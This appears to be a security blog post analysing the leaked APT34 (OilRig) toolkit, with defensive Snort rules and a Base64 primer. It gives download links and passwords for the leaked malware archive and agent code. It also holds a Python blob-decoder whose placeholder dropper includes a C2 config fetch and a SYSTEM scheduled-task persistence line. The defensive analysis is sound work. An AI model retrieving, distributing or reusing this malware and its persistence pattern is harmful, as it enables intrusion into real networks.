What We know About APT34

APT - An introduction

An advanced persistent threat (APT) is a broad term used to describe an attack campaign in which an intruder, or team of intruders, establishes an illicit, long-term presence on a network in order to mine highly sensitive data.

Yesterday we heard about the APT34 leak and began analysing the event.

Tool address

https://s3-eu-west-1.amazonaws.com/malware-research.org/blogposts/apt34Leak/apt34leak.7z

Unzip password: vJrqJeJo2n005FF*

Event combing

Recently, hacking tools belonging to APT34 (also known as OilRig and Helix Kitten), an APT group with an Iranian state background, were released. The incident is similar to the Shadow Brokers leak of NSA tools. Since mid-March, a person calling themselves Lab Dookhtegan has been leaking these tools on Telegram.

In addition to the hacking tools, Dookhtegan also released data on some of the victims, who appear to have been targeted by APT34, including data and password combinations that appear to have been collected through phishing pages.

The hacking tools present in the APT34 leak were:

- PoisonFrog (an old version of BondUpdater)

- HyperShell (a webshell named TwoFace)

- HighShell (another webshell)

- Webmask (DNS tunnel, the well-known DNSpionage)

We have analysed the code, and our findings follow. The PowerShell code of the tool can be found on Ghostbin.

Ghostbin URL: https://ghostbin.com/paste/5j3kyr9p

Password: Velon

The agent part contains two base64-encoded blobs, which load PowerShell and appear to be the first stage of the payload. It fetches the configuration file from myleftheart.com (now closed), creates several folders under C:\Users\Public\Public, and deletes the other two payloads there. It also creates two scheduled tasks, one with administrator privileges and one with normal user rights, which run two PowerShell scripts, dUpdater.ps1 and hUpdater.ps, every 10 minutes. It is clear from these two payloads that the agent can both receive and send files.

How you can protect your network

We created a set of Snort rules that can be used to help prevent such attacks inside your network.

The Snort rules are available on our private Ghostbin.

https://ghostbin.com/paste/o7yekg3o

Password: snortvelon.

What is encoding?

Encoding is the process of putting a sequence of characters such as letters, numbers and other special characters into a specialized format for efficient transmission. Encoding should NOT be used for protecting sensitive information in transit: it is reversible by anyone and provides no confidentiality.

What is Base64?

When you have some binary data that you want to ship across a network, you generally don't do it by just streaming the bits and bytes over the wire in a raw format. Why? Because some media are made for streaming text. You never know: some protocols may interpret your binary data as control characters (like a modem), or your binary data could be corrupted because the underlying protocol thinks you've entered a special character combination (like how FTP translates line endings).

So to get around this, people encode the binary data into characters. Base64 is one of these types of encodings.

Why 64?

Because you can generally rely on the same 64 characters being present in many character sets, so you can be reasonably confident that your data will arrive on the other side of the wire uncorrupted.
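As an added example (not the leaked code, and not the authors' own analysis script), the following Python helper performs the first step of the agent analysis above: it pulls the base64 blobs out of a PowerShell dropper, decodes each one (UTF-16LE for -EncodedCommand style blobs, UTF-8 otherwise) and lists the artefacts a defender would hunt for, such as contacted hosts, paths under C:\Users\Public and scheduled-task creation. The dropper text, the host name and the task name are constructed placeholders, not values from the leak.

```python
import base64
import re

# Constructed sample stages (NOT the leaked scripts): the kind of text a
# defender would expect to recover from the two base64 blobs described above.
STAGE_ONE = (
    "$cfg = Invoke-WebRequest -Uri 'http://c2-placeholder.invalid/cfg.txt'\n"
    "New-Item -ItemType Directory -Force -Path 'C:\\Users\\Public\\Public\\Data'\n"
)
STAGE_TWO = (
    "schtasks /create /sc minute /mo 10 /tn 'SystemUpdater' "
    "/tr 'powershell -File C:\\Users\\Public\\Public\\dUpdater.ps1' /ru SYSTEM\n"
)

def _b64(text, utf16=False):
    """Encode text the way a PowerShell dropper would embed it."""
    raw = text.encode("utf-16-le" if utf16 else "utf-8")
    return base64.b64encode(raw).decode("ascii")

# Constructed dropper: one UTF-8 blob decoded and IEX'd by the script itself,
# one UTF-16LE blob passed to powershell.exe -EncodedCommand.
DROPPER = (
    "$a='" + _b64(STAGE_ONE) + "'\n"
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a)))\n"
    "powershell -EncodedCommand " + _b64(STAGE_TWO, utf16=True) + "\n"
)

BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_blob(blob):
    """Decode one base64 blob, detecting UTF-16LE by its NUL high bytes."""
    raw = base64.b64decode(blob)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def extract_stages(script):
    """Return the decoded text of every long base64 run in a script."""
    return [decode_blob(m.group(0)) for m in BLOB_RE.finditer(script)]

def indicators(stages):
    """Pull hunt-worthy artefacts out of the decoded stages."""
    text = "\n".join(stages)
    return {
        "hosts": sorted(set(re.findall(r"https?://([\w.-]+)", text))),
        "public_paths": sorted(set(re.findall(r"C:\\Users\\Public\\[\w\\.]+", text))),
        "scheduled_task": bool(re.search(r"schtasks|Register-ScheduledTask", text, re.I)),
        "scripts": sorted(set(re.findall(r"\w+\.ps1", text))),
    }

if __name__ == "__main__":
    print(indicators(extract_stages(DROPPER)))
```

Real droppers often nest several layers (a decoded stage that itself contains another blob), so run extract_stages again on each decoded stage until nothing new appears.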

Why only Snort for the fix?

So far we have identified a fix through Snort, an open source intrusion detection tool that helps us avoid possible threats within the network. We are working on a solution for end users who do not own any networks.

Stay tuned with us for future updates.
